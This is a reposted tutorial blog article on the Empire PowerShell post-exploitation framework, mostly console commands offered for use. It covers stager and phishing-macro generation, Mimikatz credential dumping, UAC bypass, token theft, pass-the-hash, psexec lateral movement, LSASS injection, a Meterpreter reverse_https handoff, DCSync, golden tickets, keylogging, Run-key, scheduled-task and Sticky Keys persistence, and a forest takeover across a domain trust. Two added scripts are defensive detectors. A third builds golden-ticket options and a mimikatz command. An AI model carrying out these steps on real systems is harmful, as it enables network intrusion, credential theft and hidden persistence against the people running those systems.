A Detailed Guide to Empire, the Post-Exploitation Toolkit

2019-04-04 · about 3608 characters · estimated reading time 8 minutes

Note: this article, "A Detailed Guide to Empire, the Post-Exploitation Toolkit", was first published by backlion on the Xianzhi (先知) community on 2017-09-11 02:38:00, where it had 5782 views.

Thanks to backlion for the hard work!

I. Preface

Empire is a PowerShell post-exploitation agent and a very capable post-exploitation framework, built on cryptographically secure communications and a flexible architecture. It can run PowerShell agents without needing powershell.exe, rapidly deploy post-exploitation modules ranging from keyloggers to Mimikatz, and adapt its communications to evade network detection, all wrapped in a usability-focused framework.

II. Using Empire in detail

1. Installing Empire

wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip
unzip Empire-master.zip
cd  Empire-master
cd setup/
./install.sh
(enter a database password when prompted at the end)

Note: the newer version seems to have some small issues; here I am using the older 2015 version, which works fine. Commands have changed somewhat in newer versions.

Resetting to a clean initial state:

root@backlion:/opt/Empire-master# cd setup/
root@backlion:/opt/Empire-master/setup# ls
root@backlion:/opt/Empire-master/setup#

2. Basic command usage

cd  Empire-master
./empire

(Empire) > help #help for the main menu

(Empire) > listeners #show listeners; none exist yet, so the list is empty

(Empire: listeners) > info #show the current listener's options in detail

(Empire: listeners) > set Name bk #name the listener bk

(Empire: listeners) > execute #start the listener with these settings

(Empire: listeners) > usestager launcher bk #generate the PowerShell launcher stager for the listener named bk

(Empire: agents) > interact USSZC2P1XCTBKYGH #interact with the agent that checked in

(Empire: USSZC2P1XCTBKYGH) > upload /tmp/test.hta #upload a file to the agent host

(Empire: USSZC2P1XCTBKYGH) > shell dir #run a shell command on the agent host

(Empire: USSZC2P1XCTBKYGH) > download test.hta #download a file from the agent host

Changing the listener's IP address:

Open the database empire.db in Empire's data directory with SQLiteBrowser on Kali and edit the listener's IP there. Empire loads its listener settings from this database when it starts, so restart it after the edit.

3. Generating reverse-shell agents (stagers):

3.1 PowerShell launcher stager

(Empire: listeners) > usestager (space + Tab) #tab-complete to list the available stager modules

(Empire: listeners) > usestager launcher test #generate the PowerShell launcher; test is the listener name, which must already exist or the stager cannot be loaded

(Empire: stager/launcher) > execute #generate the launcher


Run the generated PowerShell one-liner on Windows 7 or later:


Once it runs, the Empire console reports the new agent checking in:
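The one-liner Empire hands you is a `powershell -NoP -sta -NonI -W Hidden -Enc <base64>` command. As an added example (not part of the original article and not Empire's own code), the script below shows what that launcher is made of and how to take it apart: `-EncodedCommand` accepts base64 of the UTF-16LE script bytes, so anyone who finds such a command line in Sysmon or Security 4688 process-creation events can recover the stager and its C2 URL. The stager body, the address 10.0.0.86:8080 and the path are constructed placeholders, not real Empire output.

```python
import base64
import re

# Constructed stand-in for the stager body Empire would embed; NOT real Empire output.
# The address 10.0.0.86:8080 and the path are placeholders.
SAMPLE_STAGER = ("$wc=New-Object Net.WebClient;"
                 "IEX $wc.DownloadString('http://10.0.0.86:8080/index.asp')")

# -EncodedCommand accepts any unambiguous prefix, so -e, -ec and -enc all work.
ENC_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\")]+")


def encode_launcher(script):
    """Build a launcher in the style Empire generates: no profile, single-threaded
    apartment, non-interactive, hidden window, script passed via -Enc.
    PowerShell expects base64 of the UTF-16LE bytes, which is why decoding the
    blob as plain UTF-8 text yields NUL-interleaved garbage."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell -NoP -sta -NonI -W Hidden -Enc {b64}"


def decode_launcher(cmdline):
    """Recover the script from a command line, or '' if it carries no valid encoded command."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return ""


def extract_urls(script):
    """Pull the stager/C2 URLs out of a decoded script."""
    return URL_RE.findall(script)


if __name__ == "__main__":
    cmd = encode_launcher(SAMPLE_STAGER)
    print(cmd)
    print(decode_launcher(cmd))
    print(extract_urls(decode_launcher(cmd)))
```

Run it as-is to see the encoded launcher and its decoded form; in practice you would feed `decode_launcher` the CommandLine field of a process-creation event.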

3.2 VBS launcher stager

(Empire: listeners) > usestager launcher_vbs test

(Empire: stager/launcher_vbs) > execute #generate launcher.vbs

Copy launcher.vbs to the target host and run it:

Once it runs, the Empire console reports the new agent checking in:

3.3 Phishing macro stager

On the Empire side:

(Empire: listeners) > usestager macro bk
(Empire: stager/macro) > info
(Empire: stager/macro) > execute
root@backlion:~# cat /tmp/macro

Copy the generated code into a new macro in Excel:

Save the workbook in Excel 97-2003 (.xls) format and run it:

4. Commands in the agent menu

(Empire: stager/launcher_vbs) > agents #list agents; a (*) next to the username marks an agent that has already been elevated, the others can be elevated with bypassuac

(Empire: agents) > rename EEDLABPF43FAGWHZ DC #rename an agent

(Empire: agents) > list #list agents

(Empire: agents) > list stale #list agents that have stopped checking in

(Empire: agents) > remove stale #remove agents that have stopped checking in

(Empire: agents) > list

(Empire: agents) > interact Y1DMVFG4CGKB24KP #enter an agent; again, a * on the username means the agent runs with administrative rights, otherwise it has to be elevated first

(Empire: Y1DMVFG4CGKB24KP) > help #help for the agent menu

(Empire: TKRTTL2V3BNRVDK4) > mimikatz #run Mimikatz on the agent to dump hashes (and any plaintext passwords) into the credential store

(Empire: TKRTTL2V3BNRVDK4) > creds #show all stored credentials, hashes and plaintext alike

(Empire: DGPWHW4E2Z2NT3PL) > creds krbtgt #search the stored credentials for the krbtgt account

(Empire: DGPWHW4E2Z2NT3PL) > creds plaintext #show only plaintext credentials

(Empire: DGPWHW4E2Z2NT3PL) > creds hash #show only hashes (no plaintext)

(Empire: DGPWHW4E2Z2NT3PL) > creds export /opt/hash.csv #export the credential store to a CSV file

root@backlion:/opt# cat hash.csv

(Empire: TKRTTL2V3BNRVDK4) > shell ipconfig #show the IP configuration

(Empire: TKRTTL2V3BNRVDK4) > shell net localgroup administrators #show the local Administrators group

(Empire: TKRTTL2V3BNRVDK4) > back #go back one menu

5. Module usage examples:

5.1 Checking for privilege-escalation vectors (PowerUp)

(Empire: agents) > interact P2V4CXEGRPHUD43T #enter the agent

(Empire: P2V4CXEGRPHUD43T) > usemodule (space + Tab) #tab-complete to list the modules; modules can only be used from inside an agent, and the UAC bypass only works for a user who is in the local Administrators group

(Empire: P2V4CXEGRPHUD43T) > usemodule privesc/powerup/allchecks #run all PowerUp privilege-escalation checks

(Empire: privesc/powerup/allchecks) > execute #run the checks

(Empire: privesc/powerup/allchecks) > back #go back one menu

5.2 UAC bypass

(Empire: P2V4CXEGRPHUD43T) > bypassuac test #run the UAC bypass; test is the default listener name, it can be customized but that seemed to have problems, so the default is recommended.

(Empire: P2V4CXEGRPHUD43T) > agents #the elevated agent now appears with a * on its username

(Empire: agents) > interact P2V4CXEGRPHUD43T #enter the elevated agent

(Empire: P2V4CXEGRPHUD43T) > ps #list processes

5.3 Finding hosts where the current user is a local admin

(Empire: HPEUGGBSPSAPWGZW) > usemodule situational_awareness/network/find_localadmin_access #load the module

(Empire: situational_awareness/network/find_localadmin_access) > info #show the options

(Empire: situational_awareness/network/find_localadmin_access) > execute #run it

(Empire: situational_awareness/network/find_localadmin_access) > back #go back one menu

5.4 Enumerating user account information

(Empire: HPEUGGBSPSAPWGZW) > usemodule situational_awareness/network/get_user
(Empire: situational_awareness/network/get_user) > set UserName bk
(Empire: situational_awareness/network/get_user) > set Domain bk.com
(Empire: situational_awareness/network/get_user) > execute #lists the details of the specified user

5.5 Finding where users are logged on

(Empire: HPEUGGBSPSAPWGZW) > usemodule situational_awareness/network/userhunter
(Empire: situational_awareness/network/userhunter) > info
(Empire: situational_awareness/network/userhunter) > execute #shows clearly which user is logged on to which host

5.6 Network scanning

(Empire: HPEUGGBSPSAPWGZW) > shell ping -a -n 1 192.168.99.104 #ping the IP where an admin session was found; -a resolves it to a hostname
(Empire: HPEUGGBSPSAPWGZW) > usemodule situational_awareness/network/arpscan
(Empire: situational_awareness/network/arpscan) > info
(Empire: situational_awareness/network/arpscan) > set Range 10.0.0.100-10.0.0.254
(Empire: situational_awareness/network/arpscan) > info
(Empire: situational_awareness/network/arpscan) > execute

5.7 Reverse DNS lookups

(Empire: situational_awareness/network/arpscan) > usemodule situational_awareness/network/reverse_dns
(Empire: situational_awareness/network/reverse_dns) > info
(Empire: situational_awareness/network/reverse_dns) > execute

5.8 Finding file shares

(Empire: situational_awareness/network/reverse_dns) > usemodule situational_awareness/network/sharefinder
(Empire: situational_awareness/network/sharefinder) > info
(Empire: situational_awareness/network/sharefinder) > set CheckShareAccess True #only report shares the current user can actually read
(Empire: situational_awareness/network/sharefinder) > execute

5.9 Stealing a token to access a target

(Empire: agents) > interact S4DU3VSRKR3U1DDF
(Empire: S4DU3VSRKR3U1DDF) > ps cmd #list cmd.exe processes and the users they run as
(Empire: S4DU3VSRKR3U1DDF) > steal_token 3716 #impersonate the token of PID 3716
(Empire: S4DU3VSRKR3U1DDF) > shell dir \\SCAN03\c$ #access the remote admin share with the stolen identity

5.10 Spawning a new agent on a remote host with psexec

(Empire: S4DU3VSRKR3U1DDF) > usemodule lateral_movement/invoke_psexec
(Empire: lateral_movement/invoke_psexec) > info
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > set ComputerName SCAN03
(Empire: lateral_movement/invoke_psexec) > execute
(Empire: lateral_movement/invoke_psexec) > agents

5.11 Spawning an agent by process injection

(Empire: agents) > interact YU3NGBFBPGZTV1DD
(Empire: YU3NGBFBPGZTV1DD) > ps cmd
(Empire: YU3NGBFBPGZTV1DD) > usemodule management/psinject
(Empire: management/psinject) > info
(Empire: management/psinject) > set ProcId 6536 #the original suggests the lsass.exe process; note that this needs SYSTEM rights, a failed injection crashes LSASS and reboots the host, and lsass.exe is the most closely watched process on the box, so a less sensitive target is usually the safer choice
(Empire: management/psinject) > set Listener test
(Empire: management/psinject) > execute
(Empire: management/psinject) > agents

5.12 Handing off from Empire to Metasploit

In the Empire console:

(Empire: agents) > interact XCLLHZZPAWPN1REL
(Empire: XCLLHZZPAWPN1REL) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > info
(Empire: code_execution/invoke_shellcode) > set Lhost 10.0.0.86
(Empire: code_execution/invoke_shellcode) > set Lport 4433
(Empire: code_execution/invoke_shellcode) > execute

In the msf console (here on the same host as Empire); the handler's payload, host and port must match what invoke_shellcode was given:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 10.0.0.86
msf exploit(handler) > set lport 4433
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j

5.13 Pass the hash

(Empire: XCLLHZZPAWPN1REL) > creds
(Empire: XCLLHZZPAWPN1REL) > pth 7 #pass-the-hash with the credential whose CredID is 7; this spawns a new process running under that identity
(Empire: XCLLHZZPAWPN1REL) > steal_token 12004 #steal the token of the spawned process (its PID)
(Empire: XCLLHZZPAWPN1REL) > shell dir \\SCAN03\c$ #use the stolen identity to access the target's admin share
(Empire: XCLLHZZPAWPN1REL) > rev2self #drop the impersonated token and revert to the agent's original identity

5.14 Lateral movement with psexec

(Empire: HPEUGGBSPSAPWGZW) > usemodule lateral_movement/invoke_psexec #use this module to move laterally
(Empire: lateral_movement/invoke_psexec) > info
(Empire: lateral_movement/invoke_psexec) > set ComputerName SCAN03.bk.com
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > execute

5.15 Dumping the domain krbtgt hash (DCSync)

(Empire: EEDLABPF43FAGWHZ) > usemodule credentials/mimikatz/dcsync #get the domain's krbtgt hash; DCSync asks the DC to replicate the account, so it needs an account with domain replication rights (Domain Admins by default)
(Empire: credentials/mimikatz/dcsync) > set user dc2\krbtgt
(Empire: credentials/mimikatz/dcsync) > info
(Empire: credentials/mimikatz/dcsync) > execute

5.16 Golden tickets

(Empire: EEDLABPF43FAGWHZ) > usemodule credentials/mimikatz/golden_ticket
(Empire: credentials/mimikatz/golden_ticket) > creds
(Empire: credentials/mimikatz/golden_ticket) > set CredID 1 #the stored krbtgt hash to sign the ticket with
(Empire: credentials/mimikatz/golden_ticket) > set user administrator
(Empire: credentials/mimikatz/golden_ticket) > execute
(Empire: credentials/mimikatz/golden_ticket) > usemodule credentials/mimikatz/purge #purge the Kerberos tickets (including the golden ticket) from the session
(Empire: credentials/mimikatz/purge) > execute

5.17 Collecting host details and logon events

(Empire: situational_awareness/network/reverse_dns) > usemodule situational_awareness/host/computerdetails
(Empire: situational_awareness/host/computerdetails) > info
(Empire: situational_awareness/host/computerdetails) > execute

5.18 Collecting useful information about the host

(Empire: agents) > interact EEDLABPF43FAGWHZ
(Empire: EEDLABPF43FAGWHZ) > usemodule situational_awareness/host/winenum
(Empire: situational_awareness/host/winenum) > info
(Empire: situational_awareness/host/winenum) > execute

5.19 Stealthy user hunting

(Empire: EEDLABPF43FAGWHZ) > usemodule situational_awareness/network/stealth_userhunter #like userhunter, but queries only file servers and DCs for sessions instead of touching every host
(Empire: situational_awareness/network/stealth_userhunter) > info
(Empire: situational_awareness/network/stealth_userhunter) > execute

5.20 Screenshots and keylogging

(Empire: USSZC2P1XCTBKYGH) > usemodule collection/screenshot
(Empire: collection/screenshot) > info
(Empire: collection/screenshot) > execute

(Empire: collection/screenshot) > usemodule collection/keylogger
(Empire: collection/keylogger) > info
(Empire: collection/keylogger) > execute

5.21 Persistence via a registry Run key

(Empire: EEDLABPF43FAGWHZ) > usemodule persistence/userland/registry
(Empire: persistence/userland/registry) > info
(Empire: persistence/userland/registry) > set Listener bk
(Empire: persistence/userland/registry) > set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
(Empire: persistence/userland/registry) > execute

5.22 Persistence via a scheduled task

On Empire, create the scheduled task:

(Empire: WC1PKXFTA4KNTFN4) > usemodule persistence/userland/schtasks
(Empire: persistence/userland/schtasks) > info
(Empire: persistence/userland/schtasks) > set Listener bk
(Empire: persistence/userland/schtasks) > set DailyTime 05:00
(Empire: persistence/userland/schtasks) > set RegPath HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run #the task launches the stager stored at this registry path
(Empire: persistence/userland/schtasks) > execute

Checking the scheduled tasks and the registry on the target shows that both were created successfully:

5.23 Persistence triggered when an AD user stops existing (PowerBreach deaduser)

(Empire: AG2RV3CFLLY4PZZ4) > usemodule persistence/powerbreach/deaduser
(Empire: persistence/powerbreach/deaduser) > info
(Empire: persistence/powerbreach/deaduser) > set Username DC2\test
(Empire: persistence/powerbreach/deaduser) > set Listener bk
(Empire: persistence/powerbreach/deaduser) > execute

As soon as a domain admin renames or deletes that user, the backdoor fires; here the user test is renamed to bk, which triggers it immediately.

5.24 Persistence via a Sticky Keys (sethc.exe) backdoor

(Empire: ASMR14VVZG4A33AE) > usemodule lateral_movement/invoke_wmi_debugger #uses WMI to set an Image File Execution Options Debugger value for the target binary on the remote host, so the stager runs whenever that binary is launched
(Empire: lateral_movement/invoke_wmi_debugger) > info
(Empire: lateral_movement/invoke_wmi_debugger) > set Listener bk
(Empire: lateral_movement/invoke_wmi_debugger) > set TargetBinary sethc.exe
#TargetBinary can also be Utilman.exe (Win+U), osk.exe (On-Screen Keyboard, Win+U then select it), Narrator.exe (Narrator, Win+U then select it) or Magnify.exe (Magnifier, Win+U then select it)
(Empire: lateral_movement/invoke_wmi_debugger) > set ComputerName CLINCET2
(Empire: lateral_movement/invoke_wmi_debugger) > execute

Pressing Shift five times at the target's logon screen (for example over a remote desktop session) now launches the backdoor agent.
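The three userland persistence mechanisms above (a Run key, a scheduled task backed by a registry value, and an IFEO Debugger on sethc.exe or another accessibility binary) all leave artifacts that a plain `reg export` will capture. As an added example, not from the article and not Empire's code, the Python script below parses a .reg export and flags Run entries that start PowerShell hidden or with an encoded command, and Debugger values set on accessibility binaries, while leaving a legitimate JIT debugger on notepad.exe alone. The registry contents are constructed for the demonstration (the value names, paths and base64 are made up), and it runs offline.

```python
import re

# Accessibility binaries that can be launched from the logon screen; a Debugger
# value under their IFEO key turns them into a pre-authentication backdoor.
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.IGNORECASE)
IFEO_RE = re.compile(r"\\Image File Execution Options\\([^\\]+)$", re.IGNORECASE)
# PowerShell started hidden, with an encoded command, or pulling code off the network.
PS_LAUNCHER_RE = re.compile(
    r"powershell(?:\.exe)?.*?(?:-(?:e|ec|enc|encodedcommand)\s|-w(?:indowstyle)?\s+hidden|iex|downloadstring)",
    re.IGNORECASE | re.DOTALL,
)

# Constructed .reg export (not a real capture): a benign Run entry, an Empire-style
# launcher in Run, an IFEO debugger on sethc.exe and a legitimate JIT debugger on notepad.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\bk\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="powershell -NoP -NonI -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe /c powershell -NoP -W Hidden -Enc SQBFAFgA"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="\"C:\\Program Files\\Common Files\\Microsoft Shared\\VS7Debug\\vsjitdebugger.exe\" -p %ld -e %ld"
'''


def parse_reg_export(text):
    """Parse a .reg export into {key_path: {value_name: string_value}}.
    Only REG_SZ ("...") values are kept, which is the type both Run entries
    and Debugger values use; dword:/hex: values are skipped."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and (line.startswith('"') or line.startswith("@")):
            name, _, value = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            if len(value) >= 2 and value.startswith('"') and value.endswith('"'):
                # .reg files escape backslashes and quotes inside string values
                keys[current][name] = value[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return keys


def find_persistence(keys):
    """Return (kind, key, value_name, data) for every suspicious entry."""
    findings = []
    for key, values in keys.items():
        if RUN_KEY_RE.search(key):
            for name, data in values.items():
                if PS_LAUNCHER_RE.search(data):
                    findings.append(("run_key_powershell", key, name, data))
        m = IFEO_RE.search(key)
        if m and m.group(1).lower() in ACCESSIBILITY_BINARIES and "Debugger" in values:
            findings.append(("ifeo_debugger", key, "Debugger", values["Debugger"]))
    return findings


if __name__ == "__main__":
    for kind, key, name, data in find_persistence(parse_reg_export(SAMPLE_REG)):
        print(f"[{kind}] {key}\\{name} = {data}")
```

To use it on a real host, export the relevant hives (`reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg`, and likewise the HKLM Run and Image File Execution Options keys) and pass the file contents to `parse_reg_export`. The scheduled-task half of 5.22 is caught here only through the registry value it stores; the task itself would need `schtasks /query /v` or the Task Scheduler event log.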

6. Pivoting across a child-to-parent domain trust

  1. lab.local is the parent domain and dev.lab.local the child; we already have an agent in the child domain.

  2. From the child, run the module situational_awareness/network/powerview/get_domain_trust to check the trust between child and parent (dev.lab.local and its parent lab.local have a two-way trust; because SID history is not filtered on an intra-forest trust, the child domain's DA credentials are enough to take over the whole forest).

  3. Get the SID of the parent domain's LAB\krbtgt account with the module management/user_to_sid, setting the domain and the user name.

  4. Use the module credentials/mimikatz/dcsync to get the NTLM hash of the child domain's krbtgt account; only the child account needs to be set here.

  5. Use creds krbtgt to find the child krbtgt hash:

  6. Forge a golden ticket (usemodule credentials/mimikatz/golden_ticket) as an Enterprise Admin of the parent lab.local: set user to an ordinary account in the child domain, set sids to the parent krbtgt SID from step 3 with the trailing RID 502 replaced by 519 (the Enterprise Admins group of the forest root), then execute.

  7. Use credentials/mimikatz/dcsync again to get the parent domain's krbtgt hash; this time set the krbtgt account together with the parent domain's name.

  8. creds krbtgt now also shows the parent domain's hash:

  9. The child-domain agent now has access to the parent domain's shares.

(Empire: DGPWHW4E2Z2NT3PL) > usemodule credentials/mimikatz/golden_ticket
(Empire: credentials/mimikatz/golden_ticket) > set CredID 14
(Empire: credentials/mimikatz/golden_ticket) > set user lolhax
(Empire: credentials/mimikatz/golden_ticket) > set sids 95505cle3d98a458128845353b988
(Empire: credentials/mimikatz/golden_ticket) > execute

The sids value shown above is as it appears in the original; a real value is the parent domain's SID with RID 519, in the form S-1-5-21-<parent domain sub-authorities>-519.
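As an added example (not the article's code and not Empire's), the helper below does the SID arithmetic behind step 6 and sanity-checks it: it strips the RID from the parent krbtgt SID and appends 519, refuses a SID whose RID is not 502 (so a Domain Admins or user SID cannot be passed by mistake), refuses a parent domain SID identical to the child's (which would not be a cross-trust ticket at all), then assembles the golden_ticket option set and the equivalent mimikatz kerberos::golden line. The option names user and sids come from the article's own set commands; domain, sid and krbtgt are assumed to be the remaining golden_ticket options. All SIDs and the hash are constructed placeholders.

```python
import re

# Constructed placeholders for the dev.lab.local -> lab.local scenario;
# not real SIDs or hashes from the article.
CHILD_DOMAIN_SID = "S-1-5-21-3623811015-3361044348-30300820"
PARENT_KRBTGT_SID = "S-1-5-21-1004336348-1177238915-682003330-502"
CHILD_KRBTGT_NTLM = "0123456789abcdef0123456789abcdef"  # placeholder, 32 hex digits

KRBTGT_RID = 502
ENTERPRISE_ADMINS_RID = 519  # exists only in the forest root domain

# A domain SID is S-1-5-21-<three sub-authorities>; an account SID appends a RID.
ACCOUNT_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(account_sid):
    """Return (domain_sid, rid), or raise ValueError if this is not a domain account SID."""
    m = ACCOUNT_SID_RE.match(account_sid)
    if not m:
        raise ValueError(f"not a domain account SID: {account_sid!r}")
    return m.group(1), int(m.group(2))


def enterprise_admins_sid(parent_krbtgt_sid):
    """Parent krbtgt SID (RID 502) -> parent Enterprise Admins SID (RID 519).
    Only the trailing RID changes; the domain part identifies the forest root."""
    domain, rid = split_sid(parent_krbtgt_sid)
    if rid != KRBTGT_RID:
        raise ValueError(f"expected the krbtgt SID (RID {KRBTGT_RID}), got RID {rid}")
    return f"{domain}-{ENTERPRISE_ADMINS_RID}"


def golden_ticket_options(user, child_domain, child_domain_sid,
                          child_krbtgt_ntlm, parent_krbtgt_sid):
    """Build the option set for the cross-trust golden ticket described in step 6."""
    if not re.fullmatch(r"[0-9a-fA-F]{32}", child_krbtgt_ntlm):
        raise ValueError("krbtgt hash must be a 32-hex-digit NTLM hash")
    extra_sid = enterprise_admins_sid(parent_krbtgt_sid)
    if extra_sid.rsplit("-", 1)[0] == child_domain_sid:
        raise ValueError("parent and child domain SIDs are identical; not a cross-trust ticket")
    return {
        "user": user,                    # any name in the child domain; it need not exist
        "domain": child_domain,
        "sid": child_domain_sid,         # the ticket is signed with the child krbtgt key
        "krbtgt": child_krbtgt_ntlm.lower(),
        "sids": extra_sid,               # ExtraSids: parent-domain Enterprise Admins
    }


def mimikatz_golden_command(opts):
    """Equivalent mimikatz kerberos::golden invocation (mimikatz syntax, not Empire's)."""
    return (f"kerberos::golden /user:{opts['user']} /domain:{opts['domain']} "
            f"/sid:{opts['sid']} /krbtgt:{opts['krbtgt']} /sids:{opts['sids']} /ptt")


if __name__ == "__main__":
    opts = golden_ticket_options("lolhax", "dev.lab.local", CHILD_DOMAIN_SID,
                                 CHILD_KRBTGT_NTLM, PARENT_KRBTGT_SID)
    for name, value in opts.items():
        print(f"set {name} {value}")
    print(mimikatz_golden_command(opts))
```

The printed `set` lines are what you would type into the golden_ticket module; the same-domain check is worth keeping because a user_to_sid lookup run against the wrong domain silently yields a ticket that only works in the child.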

III. Summary

Having walked through Empire's features: it can hand off to MSF for even more powerful post-exploitation, and it ships rich modules for persistence and for attacking Active Directory domains.

Keywords: ['beginner', 'introductory material']


author

旭达网络

The 旭达网络 technical blog, recording all sorts of technical problems, each solved in a single post.
This article is licensed under the Creative Commons Attribution 4.0 International License.
